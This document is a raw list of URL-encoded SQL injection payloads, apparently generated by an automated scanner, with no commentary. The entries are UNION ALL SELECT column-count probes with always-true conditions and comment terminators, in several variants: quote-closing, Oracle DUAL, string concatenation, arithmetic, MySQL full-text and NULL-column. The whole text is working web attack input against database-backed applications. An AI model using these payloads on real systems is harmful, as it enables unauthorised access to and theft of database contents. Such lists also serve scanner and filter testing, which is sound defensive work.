-8261%27%29%20WHERE%208808%3D8808%20UNION%20ALL%20SELECT%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808%2C%208808--%20 -4813%27%29%20WHERE%201829%3D1829%20UNION%20ALL%20SELECT%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829%2C%201829--%20 -5437%27%29%20WHERE%209891%3D9891%20UNION%20ALL%20SELECT%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891%2C%209891--%20 -8981%27%29%20WHERE%203798%3D3798%20UNION%20ALL%20SELECT%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798%2C%203798--%20 -6219%27%29%20WHERE%203901%3D3901%20UNION%20ALL%20SELECT%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901%2C%203901--%20 -3282%27%29%20WHERE%203236%3D3236%20UNION%20ALL%20SELECT%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236%2C%203236--%20 -9609%27%20WHERE%206464%3D6464%20UNION%20ALL%20SELECT%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464%2C%206464--%20 -2188%27%20WHERE%207685%3D7685%20UNION%20ALL%20SELECT%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685%2C%207685--%20 -8445%27%20WHERE%207091%3D7091%20UNION%20ALL%20SELECT%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091%2C%207091--%20 -9686%27%20WHERE%202702%3D2702%20UNION%20ALL%20SELECT%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702--%20 -9671%27%20WHERE%203328%3D3328%20UNION%20ALL%20SELECT%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328%2C%203328--%20 -9668%27%20WHERE%206364%3D6364%20UNION%20ALL%20SELECT%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364--%20 -1368%27%20WHERE%201053%3D1053%20UNION%20ALL%20SELECT%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053%2C%201053--%20 -1907%27%20WHERE%207812%3D7812%20UNION%20ALL%20SELECT%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812%2C%207812--%20 -3102%27%20WHERE%205669%3D5669%20UNION%20ALL%20SELECT%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669%2C%205669--%20 -1151%27%20WHERE%206674%3D6674%20UNION%20ALL%20SELECT%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674%2C%206674--%20 -7532%22%20WHERE%205147%3D5147%20UNION%20ALL%20SELECT%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147%2C%205147--%20 -4232%22%20WHERE%205881%3D5881%20UNION%20ALL%20SELECT%205881%2C%205881%2C%205881%2C%205881%2C%205881%2C%205881%2C%205881%2C%205881%2C%205881%2C%205881%2C%205881%2C%205881--%20 -8997%22%20WHERE%201236%3D1236%20UNION%20ALL%20SELECT%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236%2C%201236--%20 -2349%22%20WHERE%208413%3D8413%20UNION%20ALL%20SELECT%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413%2C%208413--%20 -8356%22%20WHERE%207088%3D7088%20UNION%20ALL%20SELECT%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088%2C%207088--%20 -5588%22%20WHERE%203094%3D3094%20UNION%20ALL%20SELECT%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094--%20 -5608%22%20WHERE%208279%3D8279%20UNION%20ALL%20SELECT%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279%2C%208279--%20 -2093%22%20WHERE%204113%3D4113%20UNION%20ALL%20SELECT%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113%2C%204113--%20 -1957%22%20WHERE%206651%3D6651%20UNION%20ALL%20SELECT%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651%2C%206651--%20 -7204%22%20WHERE%208740%3D8740%20UNION%20ALL%20SELECT%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740%2C%208740--%20 -7790%27%20%7C%7C%20%28SELECT%204223%20FROM%20DUAL%20WHERE%206788%3D6788%20UNION%20ALL%20SELECT%206788%2C%206788%2C%206788%2C%206788%2C%206788%2C%206788%2C%206788%2C%206788%2C%206788%2C%206788%2C%206788--%20%20%29%20%7C%7C%20%27 -7174%27%20%7C%7C%20%28SELECT%208568%20FROM%20DUAL%20WHERE%206369%3D6369%20UNION%20ALL%20SELECT%206369%2C%206369%2C%206369%2C%206369%2C%206369%2C%206369%2C%206369%2C%206369%2C%206369%2C%206369%2C%206369%2C%206369--%20%20%29%20%7C%7C%20%27 -4884%27%20%7C%7C%20%28SELECT%209307%20FROM%20DUAL%20WHERE%206760%3D6760%20UNION%20ALL%20SELECT%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760%2C%206760--%20%20%29%20%7C%7C%20%27 -4949%27%20%7C%7C%20%28SELECT%204451%20FROM%20DUAL%20WHERE%205784%3D5784%20UNION%20ALL%20SELECT%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784%2C%205784--%20%20%29%20%7C%7C%20%27 -6607%27%20%7C%7C%20%28SELECT%207279%20FROM%20DUAL%20WHERE%208679%3D8679%20UNION%20ALL%20SELECT%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679%2C%208679--%20%20%29%20%7C%7C%20%27 -4232%27%20%7C%7C%20%28SELECT%202275%20FROM%20DUAL%20WHERE%206026%3D6026%20UNION%20ALL%20SELECT%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026%2C%206026--%20%20%29%20%7C%7C%20%27 -6686%27%20%7C%7C%20%28SELECT%205009%20FROM%20DUAL%20WHERE%209022%3D9022%20UNION%20ALL%20SELECT%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022--%20%20%29%20%7C%7C%20%27 -3184%27%20%7C%7C%20%28SELECT%201212%20FROM%20DUAL%20WHERE%209069%3D9069%20UNION%20ALL%20SELECT%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069%2C%209069--%20%20%29%20%7C%7C%20%27 -9451%27%20%7C%7C%20%28SELECT%201291%20FROM%20DUAL%20WHERE%209313%3D9313%20UNION%20ALL%20SELECT%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313%2C%209313--%20%20%29%20%7C%7C%20%27 -5329%27%20%7C%7C%20%28SELECT%201784%20FROM%20DUAL%20WHERE%205984%3D5984%20UNION%20ALL%20SELECT%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984%2C%205984--%20%20%29%20%7C%7C%20%27 -7718%27%20%7C%7C%20%28SELECT%205202%20WHERE%209864%3D9864%20UNION%20ALL%20SELECT%209864%2C%209864%2C%209864%2C%209864%2C%209864%2C%209864%2C%209864%2C%209864%2C%209864%2C%209864%2C%209864--%20%20%29%20%7C%7C%20%27 -5772%27%20%7C%7C%20%28SELECT%209928%20WHERE%204003%3D4003%20UNION%20ALL%20SELECT%204003%2C%204003%2C%204003%2C%204003%2C%204003%2C%204003%2C%204003%2C%204003%2C%204003%2C%204003%2C%204003%2C%204003--%20%20%29%20%7C%7C%20%27 -9542%27%20%7C%7C%20%28SELECT%201123%20WHERE%204101%3D4101%20UNION%20ALL%20SELECT%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101--%20%20%29%20%7C%7C%20%27 -3974%27%20%7C%7C%20%28SELECT%205424%20WHERE%209561%3D9561%20UNION%20ALL%20SELECT%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561%2C%209561--%20%20%29%20%7C%7C%20%27 -6851%27%20%7C%7C%20%28SELECT%207047%20WHERE%208208%3D8208%20UNION%20ALL%20SELECT%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208%2C%208208--%20%20%29%20%7C%7C%20%27 -9001%27%20%7C%7C%20%28SELECT%204385%20WHERE%202648%3D2648%20UNION%20ALL%20SELECT%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648%2C%202648--%20%20%29%20%7C%7C%20%27 -2516%27%20%7C%7C%20%28SELECT%201923%20WHERE%204534%3D4534%20UNION%20ALL%20SELECT%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534%2C%204534--%20%20%29%20%7C%7C%20%27 -4689%27%20%7C%7C%20%28SELECT%208080%20WHERE%201385%3D1385%20UNION%20ALL%20SELECT%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385%2C%201385--%20%20%29%20%7C%7C%20%27 -7060%27%20%7C%7C%20%28SELECT%209877%20WHERE%209586%3D9586%20UNION%20ALL%20SELECT%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586%2C%209586--%20%20%29%20%7C%7C%20%27 -2158%27%20%7C%7C%20%28SELECT%205062%20WHERE%201349%3D1349%20UNION%20ALL%20SELECT%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349%2C%201349--%20%20%29%20%7C%7C%20%27 -3983%20%2B%20%28SELECT%208681%20FROM%20DUAL%20WHERE%209495%3D9495%20UNION%20ALL%20SELECT%209495%2C%209495%2C%209495%2C%209495%2C%209495%2C%209495%2C%209495%2C%209495%2C%209495%2C%209495%2C%209495--%20%20%29 -7677%20%2B%20%28SELECT%208673%20FROM%20DUAL%20WHERE%204705%3D4705%20UNION%20ALL%20SELECT%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705%2C%204705--%20%20%29 -9348%20%2B%20%28SELECT%201849%20FROM%20DUAL%20WHERE%203030%3D3030%20UNION%20ALL%20SELECT%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030%2C%203030--%20%20%29 -8773%20%2B%20%28SELECT%205546%20FROM%20DUAL%20WHERE%208318%3D8318%20UNION%20ALL%20SELECT%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318%2C%208318--%20%20%29 -8577%20%2B%20%28SELECT%201295%20FROM%20DUAL%20WHERE%206982%3D6982%20UNION%20ALL%20SELECT%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982--%20%20%29 -4012%20%2B%20%28SELECT%203940%20FROM%20DUAL%20WHERE%205102%3D5102%20UNION%20ALL%20SELECT%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102%2C%205102--%20%20%29 -3296%20%2B%20%28SELECT%203810%20FROM%20DUAL%20WHERE%201293%3D1293%20UNION%20ALL%20SELECT%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293%2C%201293--%20%20%29 -2835%20%2B%20%28SELECT%204050%20FROM%20DUAL%20WHERE%203012%3D3012%20UNION%20ALL%20SELECT%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012%2C%203012--%20%20%29 -5402%20%2B%20%28SELECT%204373%20FROM%20DUAL%20WHERE%202641%3D2641%20UNION%20ALL%20SELECT%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641%2C%202641--%20%20%29 -5416%20%2B%20%28SELECT%206536%20FROM%20DUAL%20WHERE%209998%3D9998%20UNION%20ALL%20SELECT%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998%2C%209998--%20%20%29 -3584%20%2B%20%28SELECT%206663%20WHERE%203941%3D3941%20UNION%20ALL%20SELECT%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941%2C%203941--%20%20%29 -6767%20%2B%20%28SELECT%209757%20WHERE%208102%3D8102%20UNION%20ALL%20SELECT%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102%2C%208102--%20%20%29 -8764%20%2B%20%28SELECT%207299%20WHERE%207669%3D7669%20UNION%20ALL%20SELECT%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669--%20%20%29 -7055%20%2B%20%28SELECT%203636%20WHERE%206537%3D6537%20UNION%20ALL%20SELECT%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537%2C%206537--%20%20%29 -1987%20%2B%20%28SELECT%203686%20WHERE%208768%3D8768%20UNION%20ALL%20SELECT%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768%2C%208768--%20%20%29 -5402%20%2B%20%28SELECT%208745%20WHERE%206250%3D6250%20UNION%20ALL%20SELECT%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250%2C%206250--%20%20%29 -5468%20%2B%20%28SELECT%202480%20WHERE%201994%3D1994%20UNION%20ALL%20SELECT%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994%2C%201994--%20%20%29 -4118%20%2B%20%28SELECT%207761%20WHERE%207795%3D7795%20UNION%20ALL%20SELECT%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795--%20%20%29 -5109%20%2B%20%28SELECT%208590%20WHERE%201165%3D1165%20UNION%20ALL%20SELECT%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165%2C%201165--%20%20%29 -7525%20%2B%20%28SELECT%203569%20WHERE%207025%3D7025%20UNION%20ALL%20SELECT%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025--%20%20%29 -9126%27%20%2B%20%28SELECT%20%27gMqN%27%20FROM%20DUAL%20WHERE%203317%3D3317%20UNION%20ALL%20SELECT%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317%2C%203317--%20%20%29%20%2B%20%27 -9990%27%20%2B%20%28SELECT%20%27oFnz%27%20FROM%20DUAL%20WHERE%201572%3D1572%20UNION%20ALL%20SELECT%201572%2C%201572%2C%201572%2C%201572%2C%201572%2C%201572%2C%201572%2C%201572%2C%201572%2C%201572%2C%201572%2C%201572--%20%20%29%20%2B%20%27 -9476%27%20%2B%20%28SELECT%20%27xYZc%27%20FROM%20DUAL%20WHERE%202969%3D2969%20UNION%20ALL%20SELECT%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969%2C%202969--%20%20%29%20%2B%20%27 -2672%27%20%2B%20%28SELECT%20%27TOfE%27%20FROM%20DUAL%20WHERE%209939%3D9939%20UNION%20ALL%20SELECT%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939%2C%209939--%20%20%29%20%2B%20%27 -1192%27%20%2B%20%28SELECT%20%27lFdd%27%20FROM%20DUAL%20WHERE%204509%3D4509%20UNION%20ALL%20SELECT%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509%2C%204509--%20%20%29%20%2B%20%27 -2968%27%20%2B%20%28SELECT%20%27dkkf%27%20FROM%20DUAL%20WHERE%209870%3D9870%20UNION%20ALL%20SELECT%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870%2C%209870--%20%20%29%20%2B%20%27 -9112%27%20%2B%20%28SELECT%20%27uEQi%27%20FROM%20DUAL%20WHERE%205424%3D5424%20UNION%20ALL%20SELECT%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424--%20%20%29%20%2B%20%27 -1610%27%20%2B%20%28SELECT%20%27Trna%27%20FROM%20DUAL%20WHERE%201057%3D1057%20UNION%20ALL%20SELECT%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057%2C%201057--%20%20%29%20%2B%20%27 -3732%27%20%2B%20%28SELECT%20%27rUOw%27%20FROM%20DUAL%20WHERE%201276%3D1276%20UNION%20ALL%20SELECT%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276%2C%201276--%20%20%29%20%2B%20%27 -8908%27%20%2B%20%28SELECT%20%27Irde%27%20FROM%20DUAL%20WHERE%204375%3D4375%20UNION%20ALL%20SELECT%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375%2C%204375--%20%20%29%20%2B%20%27 -3995%27%20%2B%20%28SELECT%20%27OCDk%27%20WHERE%209222%3D9222%20UNION%20ALL%20SELECT%209222%2C%209222%2C%209222%2C%209222%2C%209222%2C%209222%2C%209222%2C%209222%2C%209222%2C%209222%2C%209222--%20%20%29%20%2B%20%27 -3836%27%20%2B%20%28SELECT%20%27UClm%27%20WHERE%206839%3D6839%20UNION%20ALL%20SELECT%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839%2C%206839--%20%20%29%20%2B%20%27 -7252%27%20%2B%20%28SELECT%20%27Zbnn%27%20WHERE%203939%3D3939%20UNION%20ALL%20SELECT%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939%2C%203939--%20%20%29%20%2B%20%27 -3400%27%20%2B%20%28SELECT%20%27VKYn%27%20WHERE%206448%3D6448%20UNION%20ALL%20SELECT%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448%2C%206448--%20%20%29%20%2B%20%27 -8398%27%20%2B%20%28SELECT%20%27apPw%27%20WHERE%205904%3D5904%20UNION%20ALL%20SELECT%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904%2C%205904--%20%20%29%20%2B%20%27 -7855%27%20%2B%20%28SELECT%20%27ydPL%27%20WHERE%204104%3D4104%20UNION%20ALL%20SELECT%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104%2C%204104--%20%20%29%20%2B%20%27 -5785%27%20%2B%20%28SELECT%20%27DVje%27%20WHERE%209123%3D9123%20UNION%20ALL%20SELECT%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123%2C%209123--%20%20%29%20%2B%20%27 -1256%27%20%2B%20%28SELECT%20%27ckKt%27%20WHERE%203738%3D3738%20UNION%20ALL%20SELECT%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738%2C%203738--%20%20%29%20%2B%20%27 -9268%27%20%2B%20%28SELECT%20%27ffUI%27%20WHERE%206608%3D6608%20UNION%20ALL%20SELECT%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608%2C%206608--%20%20%29%20%2B%20%27 -7857%27%20%2B%20%28SELECT%20%27TrDD%27%20WHERE%202352%3D2352%20UNION%20ALL%20SELECT%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352%2C%202352--%20%20%29%20%2B%20%27 -2384%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320%2C%208320--%20%20%23 -6230%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599--%20%20%23 -4225%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033--%20%20%23 -2266%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539%2C%208539--%20%20%23 -2606%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694%2C%204694--%20%20%23 -9621%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527%2C%207527--%20%20%23 -5627%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754%2C%202754--%20%20%23 -4515%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326%2C%206326--%20%20%23 -5673%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272%2C%202272--%20%20%23 -5800%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823%2C%201823--%20%20%23 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 